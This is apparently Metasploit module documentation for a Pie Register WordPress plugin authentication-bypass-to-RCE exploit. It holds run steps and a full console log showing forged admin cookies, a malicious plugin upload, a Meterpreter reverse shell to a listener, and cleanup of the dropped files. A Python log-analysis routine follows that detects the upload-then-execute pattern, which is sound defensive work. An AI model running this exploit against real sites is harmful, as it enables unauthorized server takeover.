## Vulnerable Application

Download [pie-register.3.7.1.4.zip](https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip).
Install and activate it.  No additional configuration is required.

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/unix/webapp/wp_pie_register_bypass_rce`
1. Do: `set rhosts [IP]`
1. Do: `run`
1. You should get a shell.

## Options

### USERID

The `USERID` of a valid user to generate a cookie for.  Must be an admin user.  Defaults to `1`.

## Scenarios

### WordPress 5.4.4 with Pie Register 3.7.1.4

```
resource (pie_register.rb)> use wp_pie_register_bypass_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/webapp/wp_pie_register_bypass_rce  2021-10-08       excellent  Yes    WordPress Plugin Pie Register Auth Bypass to RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_pie_register_bypass_rce

[*] Using exploit/unix/webapp/wp_pie_register_bypass_rce
resource (pie_register.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (pie_register.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (pie_register.rb)> set verbose true
verbose => true
resource (pie_register.rb)> run
[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking /wp-content/plugins/pie-register/readme.txt
[*] Found version 3.7.1.4 in the plugin
[+] The target appears to be vulnerable.
[*] Bypassing Authentiation
[*] Found cookie: wordpress_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7Cac034a6841edfa4d49e5ab75cb37b69f52a8a92bcf9ad335bd4ad77d287b5349
[*] Found cookie: wordpress_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7Cac034a6841edfa4d49e5ab75cb37b69f52a8a92bcf9ad335bd4ad77d287b5349
[*] Found cookie: wordpress_logged_in_d2959e58288b6133e71de74309fcabfb=admin%7C1634151373%7C5hPhXSogmfTkj7p0WsuFUNe8moVYT6z8ZTcFLffuCVE%7C3f79f2326314d81da1e4fd4dd8b29a30a1666c8b6378ca719377cf0fd4e6dfff
[*] Preparing payload...
[*] Uploading payload...
[*] Acquired a plugin upload nonce: 04f6142d66
[*] Uploaded plugin iQujVpTJNo
[*] Executing the payload at /wp-content/plugins/iQujVpTJNo/pZtgbKCrHr.php...
[*] Sending stage (39282 bytes) to 1.1.1.1
[+] Deleted pZtgbKCrHr.php
[+] Deleted iQujVpTJNo.php
[+] Deleted ../iQujVpTJNo
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:51748 ) at 2021-10-11 15:16:27 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : wordpress2004
OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
Meterpreter : php/linux
```
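The session above leaves little on disk: the module reports deleting the dropped `pZtgbKCrHr.php`, `iQujVpTJNo.php` and the `iQujVpTJNo` plugin directory once the Meterpreter stage is running. What survives is the web server's access log, where the sequence reads as a plugin upload followed almost immediately by a direct request to a PHP file inside a plugin directory that was never installed by an administrator. The following detection routine is an added example written for this page, not part of the Metasploit module or its documentation. It assumes Apache/Nginx combined log format, assumes the upload goes through WordPress's `wp-admin/update.php?action=upload-plugin` handler (the module output does not name the endpoint), and uses a constructed allowlist of installed plugin slugs; the sample log lines are constructed for the example and are not from the page.

```python
import re
from datetime import datetime

# Constructed sample access-log lines (combined log format). The IPs, paths,
# timestamps and plugin names are made up for this example; the random-looking
# directory and file names mirror the shape of those the module output shows.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2021:15:16:20 -0400] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Oct/2021:15:16:24 -0400] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [11/Oct/2021:15:16:26 -0400] "GET /wp-content/plugins/iQujVpTJNo/pZtgbKCrHr.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Oct/2021:15:18:00 -0400] "GET /wp-content/plugins/pie-register/assets/style.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Oct/2021:15:18:01 -0400] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Constructed allowlist: plugin slugs an administrator actually installed.
# In practice, populate it from `wp plugin list` or a configuration baseline.
KNOWN_PLUGINS = {"pie-register", "akismet"}

# How close (in seconds) an upload and a PHP execution must be to be correlated.
UPLOAD_WINDOW = 300

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Direct request to a .php file under a plugin directory; captures the slug.
PLUGIN_PHP_RE = re.compile(r'^/wp-content/plugins/(?P<slug>[^/]+)/.*\.php(?:$|\?)')
# Assumed upload handler (core WordPress plugin-upload form target).
UPLOAD_RE = re.compile(r'^/wp-admin/update\.php\?action=upload-plugin')


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it doesn't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_suspicious_plugin_execution(log_text, known_plugins=KNOWN_PLUGINS, window=UPLOAD_WINDOW):
    """Return findings for PHP files executed from plugin directories not on the allowlist.

    A finding is rated "high" when the same client uploaded a plugin within
    `window` seconds beforehand (the upload-then-execute pattern), otherwise
    "medium" (unknown plugin directory serving PHP, worth a filesystem check).
    """
    last_upload = {}  # client IP -> timestamp of its most recent plugin upload
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and UPLOAD_RE.match(rec["path"]):
            last_upload[rec["ip"]] = rec["ts"]
            continue
        m = PLUGIN_PHP_RE.match(rec["path"])
        if not m or m.group("slug") in known_plugins:
            continue
        upload_ts = last_upload.get(rec["ip"])
        correlated = (
            upload_ts is not None
            and 0 <= (rec["ts"] - upload_ts).total_seconds() <= window
        )
        findings.append({
            "ip": rec["ip"],
            "time": rec["ts"].isoformat(),
            "slug": m.group("slug"),
            "path": rec["path"],
            "status": rec["status"],
            "severity": "high" if correlated else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_plugin_execution(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['time']} {f['path']} (slug={f['slug']}, status={f['status']})")
```

Run against the constructed sample, the routine ignores the `readme.txt` version probe and the requests into allowlisted plugin directories, and reports a single high-severity finding for `iQujVpTJNo/pZtgbKCrHr.php`, two seconds after the same client's plugin upload. Because the module cleans up after itself, treat a hit like this as a trigger to pull the database `wp_options` plugin list, the upload directory and any shell-spawning process records for that time window rather than expecting to find the PHP file still present.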
